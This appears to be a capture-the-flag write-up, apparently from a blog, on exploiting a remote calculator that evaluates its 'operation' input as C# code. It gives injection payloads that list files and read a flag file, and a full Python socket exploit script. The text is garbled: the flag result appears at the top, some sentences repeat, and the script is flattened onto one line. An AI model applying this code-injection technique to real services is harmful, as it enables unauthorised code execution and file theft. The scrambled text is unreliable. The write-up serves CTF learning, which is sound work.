We have a simple remote calculator on 54.218.12.97:34567, that listens number1, operation and number2.
Done! Flag is received: at_least_its_not_a_python_jail
It's not a python jail :)
Trying to send some values and symbols to check it.
If number1 and number2 values are not numbers, then calculator sends a message: Hey, numbers only. This is just a calculator.
But operation value may consist of any symbols. My try to inject "+123+" in operation value was successfull.
Then I've understand, that calculator is used Mono.CSharp.Evaluator.Evaluate method. Here is the exception message.
Unhandled Exception: System.ArgumentException: The expression did not set a result
at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0
at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0
at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0
[ERROR] FATAL UNHANDLED EXCEPTION:
System.ArgumentException: The expression did not set a result
at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0
at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0
at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0
Trying to get files in current directory to find a "flag" file, using the next injection in operation value.
Trying to get files in current directory to find a "flag" file, using the next injection in operation value.
op = '==1; foreach (var dir in System.IO.Directory.GetFiles(System.IO.Directory.GetCurrentDirectory())) System.Console.WriteLine(dir); 31337+'
Awesome! Flag file is found :)
/home/wbeta/flag
Now just need to read it.
Here is full exploit code:
/home/wbeta/flag
Now just need to read it.
Here is full exploit code:
import time import socket s = socket.socket() s.connect(("54.218.12.97", 34567)) # receive calculator info data = s.recv(1024) print data data = s.recv(1024) print data # set numbers and operation n1 = '0' n2 = '0' op = '==1; System.Console.WriteLine(System.IO.File.ReadAllText("/home/wbeta/flag")); 31337+' # send nums and op s.send(n1 + '\n') data = s.recv(1024) print data s.send(op + '\n') data = s.recv(1024) print data s.send(n2 + '\n') data = s.recv(1024) print data data = s.recv(1024) # thinking... while 'Done Thinking!' not in data: data = s.recv(1024) print data, # receive result data = s.recv(1024) print data
Done! Flag is received: at_least_its_not_a_python_jail
It's not a python jail :)
No comments:
Post a Comment